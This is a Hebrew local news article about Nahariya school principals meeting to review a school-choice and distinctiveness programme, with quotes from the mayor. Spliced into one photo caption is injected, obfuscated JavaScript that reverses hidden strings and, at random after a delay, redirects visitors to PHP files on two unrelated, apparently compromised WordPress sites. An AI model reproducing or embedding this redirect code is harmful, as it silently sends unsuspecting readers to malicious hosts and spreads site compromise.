fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

נהריה: מנהלי ומנהלות כלל בתי הספר בעיר התכנסו למפגש חינוכי ומקצועי

מנהלי בתי הספר בנהריה התכנסו במרכז פסג"ה במידעטק למפגש מיוחד, לסיכום שנת הפעילות של תוכנית הייחודיות והבחירה הבית ספרית. 
מפגש חינוכי בנהריה | צילום: Ritvo photography
מפגש חינוכי בנהריה | צילום: Ritvo pho$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tography

מנהלי ומנהלות כלל בתי הספר היסודיים וחטיבות הביניים בנהריה, התכנסנו יחד במרכז פסג"ה במידעטק לסכם את יישומה הפדגוגי של תוכנית 'מרחבי חינוך – אזורי בחירה וייחודיות בית ספרית', שמתקיימת בכתות א' ו-ז' בנהריה.

במפגש השתתף ראש העיר, רונן מרלי, שיחד עם ראש מינהל חינוך וקהילה בעירייה, אילן וקנין, שמעו על העשייה הרבה גם בשנה המאתגרת לצד הקורונה, ליישום הייחודיות הבית ספרית, כאשר כל מנהל ומנהלת הציגו בפורמט 'בימת שיתוף' את עיקרי הפעילות. כיום לוקחים חלק בתוכנית 10 בתי ספר יסודיים ו-4 בתי ספר על יסודיים בנהריה, כאשר המאפיינים שמובילים כל אחת מהייחודיות והזהויות של בתי הספר הם: הכלה והשתלבות, שייכות, מנהיגות, שיתופיות ותהליכים ארגוניים ניהוליים.

המנהלים שוחחו במפגש במעגלי שיח על לבטים והעלו רעיונות לשימור, לצד רעיונות לשיפור, למינוף ולהפיכת הזהות הבית ספרית, לחלק בלתי נפרד מהדנ"א הארגוני. פיתוח הזהויות הן שילוב זרועות בין צוותי המקצוע השונים בבתי הספר, בתמיכה מלאה של מינהל החינוך בעירייה, צוות הפיקוח של משרד החינוך, מרכז פסג"ה, ובליווי יועצים ארגוניים ופדגוגיים של מרחבי חינוך – אגף מו"פ ניסויים ויוזמות של משרד החינוך, במטרה לאפשר מגוון חינוכי נרחב, המקדם את עיקרון בחירת ההורים את בתי הספר עבור ילדיהם בתחילת לימודיהם בבתי הספר היסודיים ובחטיבות הביניים.

ראש העיר, רונן מרלי: "הכל מתחיל בחינוך ואנחנו ברשות משקיעים משאבים רבים בקידום תוכניות ומיזמים חינוכיים במוסדות החינוך השונים בנהריה. יש לנו צוותים מקצועיים, מנוסים ואיכותיים, שמובילים יחד את החינוך של ילדינו–דור העתיד של מדינת ישראל. הייחודיות של כל אחד מבתי הספר, מאפשרת להורים לבחור את בית הספר שמתאים ביותר לילדיהם ונותן ביטוי ליכולות האישיות של כל אחת ואחד מהתלמידים שלנו״.

מפגש חינוכי בנהריה | צילום: Ritvo photography
מפגש חינוכי בנהריה | צילום: Ritvo photography

 

 

לעדכונים נוספים בצפון 1 חדשות נהריה לחצו כאן* לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות